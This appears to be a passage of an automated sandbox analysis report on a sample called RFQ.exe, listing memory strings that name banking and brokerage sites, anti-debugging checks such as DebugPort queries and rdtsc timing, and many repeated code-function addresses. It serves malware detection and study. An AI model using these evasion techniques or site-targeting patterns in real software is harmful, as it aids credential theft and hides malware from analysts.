            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: dvvZj3l0.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: dvvZj3l0.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: dvvZj3l0.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\RFQ.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E rdtsc 5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00416EB3 LdrLoadDll,5_2_00416EB3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A70185 mov eax, dword ptr fs:[00000030h]5_2_01A70185
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEC188 mov eax, dword ptr fs:[00000030h]5_2_01AEC188
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEC188 mov eax, dword ptr fs:[00000030h]5_2_01AEC188
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4180 mov eax, dword ptr fs:[00000030h]5_2_01AD4180
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4180 mov eax, dword ptr fs:[00000030h]5_2_01AD4180
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB019F mov eax, dword ptr fs:[00000030h]5_2_01AB019F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB019F mov eax, dword ptr fs:[00000030h]5_2_01AB019F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB019F mov eax, dword ptr fs:[00000030h]5_2_01AB019F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB019F mov eax, dword ptr fs:[00000030h]5_2_01AB019F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A197 mov eax, dword ptr fs:[00000030h]5_2_01A2A197
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A197 mov eax, dword ptr fs:[00000030h]5_2_01A2A197
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A197 mov eax, dword ptr fs:[00000030h]5_2_01A2A197
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B061E5 mov eax, dword ptr fs:[00000030h]5_2_01B061E5
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A601F8 mov eax, dword ptr fs:[00000030h]5_2_01A601F8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF61C3 mov eax, dword ptr fs:[00000030h]5_2_01AF61C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF61C3 mov eax, dword ptr fs:[00000030h]5_2_01AF61C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE1D0 mov eax, dword ptr fs:[00000030h]5_2_01AAE1D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE1D0 mov eax, dword ptr fs:[00000030h]5_2_01AAE1D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE1D0 mov ecx, dword ptr fs:[00000030h]5_2_01AAE1D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE1D0 mov eax, dword ptr fs:[00000030h]5_2_01AAE1D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE1D0 mov eax, dword ptr fs:[00000030h]5_2_01AAE1D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60124 mov eax, dword ptr fs:[00000030h]5_2_01A60124
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov ecx, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov ecx, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov ecx, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov eax, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE10E mov ecx, dword ptr fs:[00000030h]5_2_01ADE10E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADA118 mov ecx, dword ptr fs:[00000030h]5_2_01ADA118
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADA118 mov eax, dword ptr fs:[00000030h]5_2_01ADA118
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADA118 mov eax, dword ptr fs:[00000030h]5_2_01ADA118
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADA118 mov eax, dword ptr fs:[00000030h]5_2_01ADA118
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF0115 mov eax, dword ptr fs:[00000030h]5_2_01AF0115
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04164 mov eax, dword ptr fs:[00000030h]5_2_01B04164
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04164 mov eax, dword ptr fs:[00000030h]5_2_01B04164
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC4144 mov eax, dword ptr fs:[00000030h]5_2_01AC4144
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC4144 mov eax, dword ptr fs:[00000030h]5_2_01AC4144
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC4144 mov ecx, dword ptr fs:[00000030h]5_2_01AC4144
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC4144 mov eax, dword ptr fs:[00000030h]5_2_01AC4144
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC4144 mov eax, dword ptr fs:[00000030h]5_2_01AC4144
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C156 mov eax, dword ptr fs:[00000030h]5_2_01A2C156
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC8158 mov eax, dword ptr fs:[00000030h]5_2_01AC8158
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A36154 mov eax, dword ptr fs:[00000030h]5_2_01A36154
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A36154 mov eax, dword ptr fs:[00000030h]5_2_01A36154
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A280A0 mov eax, dword ptr fs:[00000030h]5_2_01A280A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC80A8 mov eax, dword ptr fs:[00000030h]5_2_01AC80A8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF60B8 mov eax, dword ptr fs:[00000030h]5_2_01AF60B8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF60B8 mov ecx, dword ptr fs:[00000030h]5_2_01AF60B8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3208A mov eax, dword ptr fs:[00000030h]5_2_01A3208A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A0E3 mov ecx, dword ptr fs:[00000030h]5_2_01A2A0E3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A380E9 mov eax, dword ptr fs:[00000030h]5_2_01A380E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB60E0 mov eax, dword ptr fs:[00000030h]5_2_01AB60E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C0F0 mov eax, dword ptr fs:[00000030h]5_2_01A2C0F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A720F0 mov ecx, dword ptr fs:[00000030h]5_2_01A720F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB20DE mov eax, dword ptr fs:[00000030h]5_2_01AB20DE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A020 mov eax, dword ptr fs:[00000030h]5_2_01A2A020
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C020 mov eax, dword ptr fs:[00000030h]5_2_01A2C020
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6030 mov eax, dword ptr fs:[00000030h]5_2_01AC6030
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB4000 mov ecx, dword ptr fs:[00000030h]5_2_01AB4000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD2000 mov eax, dword ptr fs:[00000030h]5_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E016 mov eax, dword ptr fs:[00000030h]5_2_01A4E016
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E016 mov eax, dword ptr fs:[00000030h]5_2_01A4E016
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E016 mov eax, dword ptr fs:[00000030h]5_2_01A4E016
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E016 mov eax, dword ptr fs:[00000030h]5_2_01A4E016
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5C073 mov eax, dword ptr fs:[00000030h]5_2_01A5C073
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A32050 mov eax, dword ptr fs:[00000030h]5_2_01A32050
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6050 mov eax, dword ptr fs:[00000030h]5_2_01AB6050
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E388 mov eax, dword ptr fs:[00000030h]5_2_01A2E388
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E388 mov eax, dword ptr fs:[00000030h]5_2_01A2E388
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E388 mov eax, dword ptr fs:[00000030h]5_2_01A2E388
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5438F mov eax, dword ptr fs:[00000030h]5_2_01A5438F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5438F mov eax, dword ptr fs:[00000030h]5_2_01A5438F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28397 mov eax, dword ptr fs:[00000030h]5_2_01A28397
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28397 mov eax, dword ptr fs:[00000030h]5_2_01A28397
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28397 mov eax, dword ptr fs:[00000030h]5_2_01A28397
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A403E9 mov eax, dword ptr fs:[00000030h]5_2_01A403E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E3F0 mov eax, dword ptr fs:[00000030h]5_2_01A4E3F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E3F0 mov eax, dword ptr fs:[00000030h]5_2_01A4E3F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E3F0 mov eax, dword ptr fs:[00000030h]5_2_01A4E3F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A663FF mov eax, dword ptr fs:[00000030h]5_2_01A663FF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEC3CD mov eax, dword ptr fs:[00000030h]5_2_01AEC3CD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A3C0 mov eax, dword ptr fs:[00000030h]5_2_01A3A3C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A383C0 mov eax, dword ptr fs:[00000030h]5_2_01A383C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A383C0 mov eax, dword ptr fs:[00000030h]5_2_01A383C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A383C0 mov eax, dword ptr fs:[00000030h]5_2_01A383C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A383C0 mov eax, dword ptr fs:[00000030h]5_2_01A383C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB63C0 mov eax, dword ptr fs:[00000030h]5_2_01AB63C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE3DB mov eax, dword ptr fs:[00000030h]5_2_01ADE3DB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE3DB mov eax, dword ptr fs:[00000030h]5_2_01ADE3DB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE3DB mov ecx, dword ptr fs:[00000030h]5_2_01ADE3DB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADE3DB mov eax, dword ptr fs:[00000030h]5_2_01ADE3DB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD43D4 mov eax, dword ptr fs:[00000030h]5_2_01AD43D4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD43D4 mov eax, dword ptr fs:[00000030h]5_2_01AD43D4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B08324 mov eax, dword ptr fs:[00000030h]5_2_01B08324
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B08324 mov ecx, dword ptr fs:[00000030h]5_2_01B08324
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B08324 mov eax, dword ptr fs:[00000030h]5_2_01B08324
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B08324 mov eax, dword ptr fs:[00000030h]5_2_01B08324
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A30B mov eax, dword ptr fs:[00000030h]5_2_01A6A30B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A30B mov eax, dword ptr fs:[00000030h]5_2_01A6A30B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A30B mov eax, dword ptr fs:[00000030h]5_2_01A6A30B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C310 mov ecx, dword ptr fs:[00000030h]5_2_01A2C310
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50310 mov ecx, dword ptr fs:[00000030h]5_2_01A50310
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD437C mov eax, dword ptr fs:[00000030h]5_2_01AD437C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB2349 mov eax, dword ptr fs:[00000030h]5_2_01AB2349
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov eax, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov eax, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov eax, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov ecx, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov eax, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB035C mov eax, dword ptr fs:[00000030h]5_2_01AB035C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA352 mov eax, dword ptr fs:[00000030h]5_2_01AFA352
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD8350 mov ecx, dword ptr fs:[00000030h]5_2_01AD8350
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B0634F mov eax, dword ptr fs:[00000030h]5_2_01B0634F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A402A0 mov eax, dword ptr fs:[00000030h]5_2_01A402A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A402A0 mov eax, dword ptr fs:[00000030h]5_2_01A402A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov eax, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov ecx, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov eax, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov eax, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov eax, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC62A0 mov eax, dword ptr fs:[00000030h]5_2_01AC62A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E284 mov eax, dword ptr fs:[00000030h]5_2_01A6E284
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E284 mov eax, dword ptr fs:[00000030h]5_2_01A6E284
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB0283 mov eax, dword ptr fs:[00000030h]5_2_01AB0283
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB0283 mov eax, dword ptr fs:[00000030h]5_2_01AB0283
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB0283 mov eax, dword ptr fs:[00000030h]5_2_01AB0283
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A402E1 mov eax, dword ptr fs:[00000030h]5_2_01A402E1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A402E1 mov eax, dword ptr fs:[00000030h]5_2_01A402E1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A402E1 mov eax, dword ptr fs:[00000030h]5_2_01A402E1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A2C3 mov eax, dword ptr fs:[00000030h]5_2_01A3A2C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A2C3 mov eax, dword ptr fs:[00000030h]5_2_01A3A2C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A2C3 mov eax, dword ptr fs:[00000030h]5_2_01A3A2C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A2C3 mov eax, dword ptr fs:[00000030h]5_2_01A3A2C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A2C3 mov eax, dword ptr fs:[00000030h]5_2_01A3A2C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B062D6 mov eax, dword ptr fs:[00000030h]5_2_01B062D6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2823B mov eax, dword ptr fs:[00000030h]5_2_01A2823B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34260 mov eax, dword ptr fs:[00000030h]5_2_01A34260
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34260 mov eax, dword ptr fs:[00000030h]5_2_01A34260
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34260 mov eax, dword ptr fs:[00000030h]5_2_01A34260
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2826B mov eax, dword ptr fs:[00000030h]5_2_01A2826B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0274 mov eax, dword ptr fs:[00000030h]5_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB8243 mov eax, dword ptr fs:[00000030h]5_2_01AB8243
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB8243 mov ecx, dword ptr fs:[00000030h]5_2_01AB8243
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B0625D mov eax, dword ptr fs:[00000030h]5_2_01B0625D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2A250 mov eax, dword ptr fs:[00000030h]5_2_01A2A250
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A36259 mov eax, dword ptr fs:[00000030h]5_2_01A36259
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA250 mov eax, dword ptr fs:[00000030h]5_2_01AEA250
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA250 mov eax, dword ptr fs:[00000030h]5_2_01AEA250
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB05A7 mov eax, dword ptr fs:[00000030h]5_2_01AB05A7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB05A7 mov eax, dword ptr fs:[00000030h]5_2_01AB05A7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB05A7 mov eax, dword ptr fs:[00000030h]5_2_01AB05A7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A545B1 mov eax, dword ptr fs:[00000030h]5_2_01A545B1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A545B1 mov eax, dword ptr fs:[00000030h]5_2_01A545B1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A32582 mov eax, dword ptr fs:[00000030h]5_2_01A32582
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A32582 mov ecx, dword ptr fs:[00000030h]5_2_01A32582
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A64588 mov eax, dword ptr fs:[00000030h]5_2_01A64588
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E59C mov eax, dword ptr fs:[00000030h]5_2_01A6E59C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
